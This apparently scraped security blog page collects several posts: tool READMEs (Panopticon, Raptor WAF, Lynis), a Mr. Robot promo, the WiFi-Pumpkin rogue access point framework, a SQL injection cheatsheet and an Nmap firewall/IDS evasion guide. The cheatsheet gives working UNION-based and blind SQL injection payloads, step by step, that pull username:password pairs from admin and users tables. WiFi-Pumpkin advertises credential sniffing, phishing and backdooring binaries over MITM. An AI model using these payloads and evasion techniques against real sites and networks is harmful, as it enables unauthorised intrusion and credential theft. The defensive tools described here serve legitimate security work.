A Libre Cross-Platform Disassembler - Panopticon

Panopticon is a cross platform disassembler for reverse engineering written in Rust. Panopticon has functions for disassembling, analysing decompiling and patching binaries for various platforms and instruction sets.

Panopticon comes with GUI for browsing control flow graphs, displaying analysis results, controlling debugger instances and editing the on-disk as well as in-memory representation of the program.

Building

Panopticon builds with Rust stable. The only dependencies aside from a working Rust 1.7 toolchain and Cargo you need Qt 5.4 installed.

Linux
Install Qt using your package manager.
Ubuntu 15.10 and 16.04:

sudo apt install qt5-default qtdeclarative5-dev \
                 qml-module-qtquick-controls qml-module-qttest \
                 qml-module-qtquick2 qml-module-qtquick-layouts \
                 qml-module-qtgraphicaleffects \
                 qtbase5-private-dev pkg-config \
                 git build-essential cmake

Fedora 22 and 23:

sudo dnf install qt5-qtdeclarative-devel qt5-qtquickcontrols \
                 qt5-qtgraphicaleffects

After that clone the repository onto disk and use cargo to build everything.

git clone https://github.com/das-labor/panopticon.git
cd panopticon
cargo build

Gentoo:

layman -a rust
layman -f -o https://raw.github.com/das-labor/labor-overlay/master/labor-overlay -a labor-overlay

emerge -av panopticon

Windows
Install the Qt 5.4 SDK and the Rust toolchain Panopticon can be build using  cargo build.

Running
The current version only supports AVR and has no ELF or PE loader yet. To test Panopticon you need relocated AVR code. Such a file is prepared in  tests/data/sosse.

Contributing
Panopticon is licensed under GPLv3 and is Free Software. Hackers are always welcome. See https://panopticon.re for our project documentation. Panopticon uses Github for issue tracking: https://github.com/das-labor/panopticon/issues

Contact
IRC: #panopticon on Freenode. Twitter: @_cibo_

Download Panopticon

Read More

Web Application Firewall using DFA - Raptor WAF v0.2

Raptor WAF is a simple web application firewall made in C, using KISS principle, to make poll use select() function, is not better than epoll() or kqueue() from *BSD but is portable,  the core of match engine using DFA to detect XSS, SQLi and path traversal.

No more words, look at the following :

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and XSS...

• You can block XSS, SQL injection attacks and path traversal with Raptor
• You can use blacklist of IPs to block some users at config/blacklist ip.txt
• You can use IPv6 and IPv4 at communications
• At the future DoS protector, request limit, rule interpreter and Malware detector at uploads.
• At the future SSL/TLS...

to run:

$ git clone https://github.com/CoolerVoid/raptor_waf
$ cd raptor_waf; make; bin/raptor

Example

Up some HTTPd server at port 80

$ bin/Raptor -h localhost -p 80 -r 8883 -w 4 -o loglog.txt

you can test at http://localhost:8883/test.php

Look the docs

https://github.com/CoolerVoid/raptor_waf/blob/master/doc/raptor.pdf

Tests:

509 of attacks, detect and block 349, 68% of attacks blocked

Steps to create your WAF(web application firewall) in C

Following definition (like OWASP), a WAF is a piece of software intended to protect a web app that is on the level of the application. nowadays, a WAF is not defined by the web app, it’s not a customized solution specific to that application but similarly to a general software firewall, where one that contains parameters to protect against intrusion in a wide variety of frameworks and codes. Trying clear your mind, there is overlap between the different types of firewalls. Software and hardware firewalls are used in their own right to protect networks. However, WAFs with their specialized function for web applications, can take the form input of either of those two main types. Per default, a firewall uses a blacklist, protecting against an individual, previously logged attacks. Additionally, it can also use a white list, providing allowable users and instances of interaction for the application, another function is block SQL Injection attacks and XSS attacks… Another context  WAFs can create random tokens and put in forms to try blocks web robots and automated attacks, this practice can try mitigate CSRF pitfalls. Before you ask “How i can do  it?”, i gotta bring to you some principles, anyway the theory around facts…

Have two common WAFs:

1- Uses plugin in HTTPd to get information of data INPUT or OUTPUT, before finish he gets the request and block some contents, this function focuses at HTTP METHODs POST, GET…  

 2- This way, is my favorite, is a independent reverse proxy server, he bring all requests of the client to the proxy, the proxy makes some analysis in the content, if not block, he send all the information to the external server… 

  

Number One is a cold, this path is not fully portable… other bad thing you need create a diferent plugin each HTTPd, something to apache another to NGINX, IIs, lighttpd…  its not cool! If you are not a good low level programmer… you can try use twisted of python, is easy make reverse proxy with it, but is not good way, because not have good performance in production… if you piss off for it, study the Stevens book of sockets. Its OK, the title of this post is “create waf in C”, Task fully done here and commented and with some documentations in LaTex… relax, you can get it in this repository:

Download Raptor

Read More

Security Auditing Tool for Unix/Linux Systems - Lynis 2.3.2

We are excited to announce this major release of auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next of simplification improvements we made. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool. Used by system administrators, security professionals, and auditors, to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix based systems and versions, including:

• AIX
• FreeBSD
• HP-UX
• Linux
• Mac OS
• NetBSD
• OpenBSD
• Solaris
• and others

It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional

Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). 

How it works

Lynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report.

Steps

1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update
4. Run tests from enabled plugins
5. Run security tests per category
6. Report status of security scan

Besides the data displayed on screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.

Opportunistic scanning

Lynis scanning is opportunistic: it uses what it can find.

For example if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers a SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates, so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:

• Security auditing
• Compliance testing (e.g. PCI, HIPAA, SOx)
• Vulnerability detection and scanning
• System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.

• Best practices
• CIS
• NIST
• NSA
• OpenSCAP data
• Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Lynis Plugins

lugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.


Changelog

Categories and Groups

Tests are now grouped by their focus area and named 'groups' accordingly. Besides groups, each test will belong to a category (performance, privacy, or security).
Commands: lynis show categories, lynis show groups Options: --tests-from-category, --tests-from-group
Note: You might need to change your scripts if you previously defined the group of tests to scan.
Development

---

A new 'strict' option is available in the profiles and by default enabled for the initialization phases of Lynis. It will perform a strict code check for the tests, to detect any uninitialized variables, improving code quality.

Helpers

With 'lynis update check' you can now check for updates. This is the preferred new method.
The command 'lynis show changelog' allows reviewing the changes. Optionally a release can be specified as additional argument.

Languages

Initial translation for German has been contributed by Kai Raven. The Italian translation by Stefano Marty (stefanomarty). Hungarian translation by Zoltan Paldi (paldiz)

Profiles

Parsing of the profiles has been improved, which prevented some settings from overriding default settings.

Tests

• AUTH-9212 - Added prerequisite to log
• AUTH-9216 - Simplified test and make it more efficient
• AUTH-9218 - Clean ups and improve readability
• AUTH-9226 - Style, text, and removed warning
• AUTH-9228 - Provide just a suggestion instead of warning
• AUTH-9268 - Improve test for readability
• AUTH-9328 - Test /etc/profile.d for umask setting
• AUTH-9406 - Readability and code style changes
• CONT-8102 - Determine if all Docker tests should be performed
• DBS-1880 - Initial support for Redis server
• HTTP-6720 - Readability improvement of test
• KRNL-5830 - Readability and style improvements, ignore rescue images
• MAIL-8818 - Style and refactoring
• PHP-2211 - Readability improvement and code style changes
• PHP-2374 - Changed text and cleanups
• PHP-2376 - Log result to log file instead of report
• PKGS-7383 - Simplified test
• PKGS-7388 - Style and readability improvements
• TIME-3106 - Corrected string to test for status
• TOOL-5102 - Split of fail2ban tests
• TOOL-5104 - Test for enabled fail2ban jails

Languages

Translation of Spanish (es) added Proper display of text strings when accented characters are used More text strings added

General

• Added bold and header as new colors
• Changed header and footer of screen output
• Allow atomic tests to be skipped (e.g. SSH-7408)
• Extended tests database with category (lynis show tests)
• By default Lynis will now run in 'quick mode' and not break after each section. You can get this behavior by adding the --wait option.

Functions

• RemoveColors - New test to clear colors
• DisplayError - Display error on screen in uniform format and colors Use an optional exit code to quit the program
• SkipAtomicTest - This function is now properly working with lowercase strings

Website

Several controls on the website are added or updated, including:

• FILE-6344
• FINT-4315
• FINT-4402
• HTTP-6714
• MACF-6234
• NAME-4018
• NAME-4402
• PHP-2374
• PROC-3612
• TIME-3106

Download Lynis 2.3.2

Read More

Tonight Mr. Robot is Going to Reveal ‘Dream Device For Hackers’

Mr. Robot is the rare show that provides a realistic depiction of hacks and vulnerabilities that are at the forefront of cyber security. This is the reason it’s been the most popular TV show of its kind.

Throughout season 1 and season 2, we have seen that connected devices are the entry point of choice of Elliot and fsociety to breach networks and traditional security controls.

Pwn Phone On Mr. Robot Show

In this week’s episode, Elliot uses a Pwnie Express Pwn Phone, which he describes as “a dream device for pentester,” to run a custom script he has written to take over someone else’s phone.

Security pros have long know about the Pwn Phone as a powerful mobile platform for penetration testing and security assessments, so it is not surprising to see it on Mr. Robot.

The coolest part is that Pwnie Express is giving away a Pwn Phone, just like the one used in the show.

The Pwn Phone is a mobile pentesting device that makes it incredibly easy to evaluate wired, wireless and Bluetooth networks. It is built on Kali Linux that comes pre-packaged with over 100 built-in and ‘one-click’ tools, and it can run third-party scripts.

The Pwn Pad exists for security pros who want a tablet version, and it’s also available via the Android Open Pwn Project.

The Pwn Phone is the latest in a series of connected device hacks on Mr. Robot that have included a Femtocell, a Raspberry Pi, and Bluetooth sniffers, along with the hack of an E-Corp exec’s connected home and the crucial meltdown of E-Corp’s data center by using a connected HVAC system.

These are real threats that are being exploited by criminals to gain unauthorized access and steal data from companies today.

In the past, Pwnie has made it clear that they do not condone the criminal use of penetration testing tools and devices. But pentesting is important, and having the tools to do it properly is part of that process.

Sometimes you need to break things to find and fix serious security vulnerabilities in the devices and networks that permeate nearly every facet of our daily lives. The bad guys have every tool available to them; white hats should be equally well-equipped.

And as for what Elliot does in the show?

He’s a pretty well-established gray character. Is he good? Or is he bad?

Either way, it was pretty cool.

Source: Tha Hackers News

OffensiveSec

Read More

Framework for Rogue Wi-Fi Access Point Attack - WiFi-Pumpkin v0.8.1

Framework for Rogue Wi-Fi Access Point Attack

Description
WiFi-Pumpkin is a open source security tool that provides the Rogue access point to Man-In-The-Middle and network attacks.

Installation
Kali 2.0/WifiSlax 4.11.1/Parrot 3.0.1/2.0.5

• Python 2.7

 git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
 cd WiFi-Pumpkin
 ./installer.sh --install

refer to the wiki for Installation

Features

• Rogue Wi-Fi Access Point
• Deauth Attack Clients AP
• Probe Request Monitor
• DHCP Starvation Attack
• Credentials Monitor
• Transparent Proxy
• Windows Update Attack
• Phishing Manager
• Partial Bypass HSTS protocol
• Support beef hook
• Mac Changer
• ARP Poison
• DNS Spoof
• Patch Binaries via MITM

Plugins

Plugin	Description
net-creds	Sniff passwords and hashes from an interface or pcap file
dns2proxy	This tools offer a different features for post-explotation once you change the DNS server to a Victim.
sslstrip2	Sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks based version fork @LeonardoNve/@xtr4nge.
sergio-proxy	Sergio Proxy (a Super Effective Recorder of Gathered Inputs and Outputs) is an HTTP proxy that was written in Python for the Twisted framework.
BDFProxy-ng	Patch Binaries via MITM: BackdoorFactory + mitmProxy, bdfproxy-ng is a fork and review of the original BDFProxy @secretsquirrel.

Transparent Proxy
Transparent proxies that you can use to intercept and manipulate HTTP/HTTPS traffic modifying requests and responses, that allow to inject javascripts into the targets visited. You can easily implement a module to inject data into pages creating a python file in directory "Proxy" automatically will be listed on PumpProxy tab.

Plugins Example
The following is a sample module that injects some contents into the tag to set blur filter into body html page:

import logging
from Plugin import PluginProxy
from Core.Utils import setup_logger

class blurpage(PluginProxy):
    ''' this module proxy set blur into body page html response'''
    _name          = 'blur_page'
    _activated     = False
    _instance      = None
    _requiresArgs  = False

    @staticmethod
    def getInstance():
        if blurpage._instance is None:
            blurpage._instance = blurpage()
        return blurpage._instance

    def __init__(self):
        self.injection_code = []

    def LoggerInjector(self,session):
        setup_logger('injectionPage', './Logs/AccessPoint/injectionPage.log',session)
        self.logging = logging.getLogger('injectionPage')

    def setInjectionCode(self, code,session):
        self.injection_code.append(code)
        self.LoggerInjector(session)

    def inject(self, data, url):
        injection_code = '''<head> <style type="text/css">
        body{
        filter: blur(2px);
        -webkit-filter: blur(2px);}
        </style>'''
        self.logging.info("Injected: %s" % (url))
        return data.replace('<head>',injection_code )

Screenshots

• Kali Linux 2.0

• kubuntu 15.10 

• Parrot OS

FAQ
FAQ on the wiki

Download WiFi-Pumpkin

Read More

Full SQL Injections - Cheatsheet

[1]* -Introducing The SQL Injection Vuln:

SQL injection attacks are known also as SQL insertion
it's in the form of executing some querys in the database and getting acces to informations (SQL Vesion, Number & Names of tables and columns,some authentification infos,ect...)

[2]* -Exploiting Sql Injection Vuln :

Before proceeding to the exploitation of sql injections we have to checking for this vulnerability, so we have an exemple

http://www.website.com/articles.php?id=3

for checking the vulnerability we have to add ' (quote) to the url , lets see together

http://www.website.com/articles.php?id=3'

now, if we get an error like this "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."

this website is vulnerable to sql injection, and if we don't get anything we can't exploiting this vulnerability.

Now, Lets go to exploiting this vuln and finding some informations about this sql database


certainly before doing anything we have to find the number of columns

[-] Finding the number of columns:

for finding the number of columns we use ORDER BY to order result in the database

lets see that ,

http://www.website.com/articles.php?id=3 order by 1/*

and if we havn't any error we try to change the number

http://www.website.com/articles.php?id=3 order by 2/*

still no error,so we continu to change the number

http://www.website.com/articles.php?id=3 order by 3/*

no error to

http://www.website.com/articles.php?id=3 order by 4/*

no error

http://www.website.com/articles.php?id=3 order by 5/*

yeah , here we have this error (Unknown column '5' in 'order clause')

so, this database has 4 colmuns because the error is in the 5

now, we try to check that UNION function work or not

[-] Checking UNION function :

for using UNION function we select more informations from the database in one statment

so we try this

http://www.website.com/articles.php?id=3 union all select 1,2,3,4/* (in the end it's 4 because we have see the number of columns it's 4)

now, if we see some numbers in the page like 1 or 2 or 3 or 4 == the UNION function work

if it not work we try to change the /* to --

so we have this

http://www.website.com/articles.php?id=3 union all select 1,2,3,4--

after checking the UNION function and it works good we try to get SQL version

[-] Getting SQL Version :

now we have a number in the screen after checking the UNION

we say in example that this number is 3

so we replace 3 with @@version or version()

http://www.website.com/articles.php?id=3 union all select 1,2,@@version,4/*

and now we have the version in the screen!

lets go now to get tables and columns names


[-] Getting tables and columns names :

here we have a job to do!!

if the MySQL Version is < 5 (i.e 4.1.33, 4.1.12...)

lets see that the table admin exist!

http://www.website.com/articles.php?id=3 union all select 1,2,3,4,5 from admin/*

and here we see the number 3 that we had in the screen

now, we knows that the table admin exists

here we had to check column names:

http://www.website.com/articles.php?id=3 union all select 1,2,username,4,5 from admin/*

if we get an error we have to try another column name

and if it work we get username displayed on screen (example: admin,moderator,super moderator...)

after that we can check if column password exists

we have this

http://www.website.com/articles.php?id=3 union all select 1,2,password,4,5 from admin/*

and oups! we see password on the screen in a hash or a text

now we have to use 0x3a for having the informations like that username:password ,dmin:unhash...

http://www.website.com/articles.php?id=3 union all select 1,2,concat(username,0x3a,password),4,5 from admin/*

this is the sample SQL Injection , now, we will go to the blind sql injection (more difficult)


[3]* -Exploiting Blind SQL Injection Vuln :

first we should check if website is vulnerable for example

http://www.website.com/articles.php?id=3

and to test the vulnerability we had to use

http://www.website.com/articles.php?id=3 and 1=1 ( we havn't any error and the page loads normally)

and now

http://www.website.com/articles.php?id=3 and 1=2

here we have some problems with text, picture and some centents ! and it's good! this website is vulnerable for Blind SQL Injection

we have to check MySQL Version

[-] Getting MySQL Version :

we use substring in blind injection to get MySQL Version

http://www.website.com/articles.php?id=3 and substring(@@version,1,1)=4

we should replace the 4 with 5 if the version is 5

http://www.website.com/articles.php?id=3 and substring(@@version,1,1)=5

and now if the function select do not work we should use subselect and we should testing if it work

[-] Testing if subselect works :

http://www.website.com/articles.php?id=3 and (select 1)=1 ( if the page load normaly the subselect works good)

and now we have to see if we have access to mysql.user

http://www.website.com/articles.php?id=3 and (select 1 from mysql.user limit 0,1)=1 (if it load normaly we have access to mysql.user)

now, we can checking table and column names

[-] Checking table and column names :

http://www.website.com/articles.php?id=3 and (select 1 from users limit 0,1)=1

if the page load normaly and no errors the table users exists

now we need column name

http://www.website.com/articles.php?id=3 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page load normaly and no errors the column password exists

now we have the table and the column , yeah, we can exploiting the vunlnerability now

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

the page load normaly and no errors,so we need to change the 80 for having an error

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>90

no errors ! we continu

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

Yeah!! an error

the character is char(99). we use the ascii converter and we know that char(99) is letter 'c'

to test the second character we change ,1,1 to ,2,1

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

the page load normaly

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

the page loads normally, higher !!!

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

error ! lower number

http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

Error That we search!!

now, we know that the second character is char(105) and that is 'i' with the ascii converter. We have 'ci' now from the first and the second charactets

our tutorial draws to the close!

Thanks you for reading and i hope that you have understand SQL Injection and exploitations of this vulnerability .

Source: www.exploit-db.com

By OffensiveSec

Read More

Firewall and IDS Evasion / Bypassing the Firewalls and IDS/IPS - NMAP Scanning Tutorial

This post is for penetration testers that face issues with scanning the Corporate networks with firewalls deployed and are unable to bypass the Firewall or an IDS/IPS .
Firewall is generally a software or hardware to protect private network from public network.This is a trouble maker for the Penetration testers as they are not able to bypass this added layer of security .
Well the good news here is that we can use Nmap options to bypass the firewalls , IDS/IPS .
If a penetration tester can bypass firewall then half game is won for the penetration tester. In this tutorial you will learn how to bypass and test firewall using the NMAP options.

NMAP options to Bypass the Firewall :

• -f (fragment packets):

This option is to make it harder to detect the packets. By specifying this option once, Nmap will split the packet into 8 bytes or less after the IP header. This makes the detection of Nmap sent packets difficult .

• –mtu:

With this option, you can specify your own packet size fragmentation. The Maximum Transmission Unit (MTU) must be a multiple of eight or Nmap will give an error and exit. This helps in Firewall Evasion .

• -D (decoy):

By using this option, Nmap will send some of the probes from the spoofed IP addresses specified by the user. The idea is to mask the true IP address of the user in the logfiles. The user IP address is still in the logs. You can use RND to generate a random IP address or RND:number to generate the <number> IP address. The hosts you use for decoys should be up, or you will flood the target. Also remember that by using many decoys you can cause network congestion, so you may want to avoid that especially if you are scanning your client network.

• –source-port <portnumber> or –g (spoof source port):

This option will be useful if the firewall is set up to allow all incoming traffic that comes from a specific port.

• –data-length:

This option is used to change the default data length sent by Nmap in order to avoid being detected as Nmap scans.

• –max-parallelism:

This option is usually set to one in order to instruct Nmap to send no more than one probe at a time to the target host.

• –scan-delay <time>:

This option can be used to evade IDS/IPS that uses a threshold to detect port scanning activity. Setting the Scan delay is always a good idea when you want to evade any security device .

Sources : Nmap.org

OffSec 

http://nmap.org/book/man-bypass-firewalls-ids.html

Read More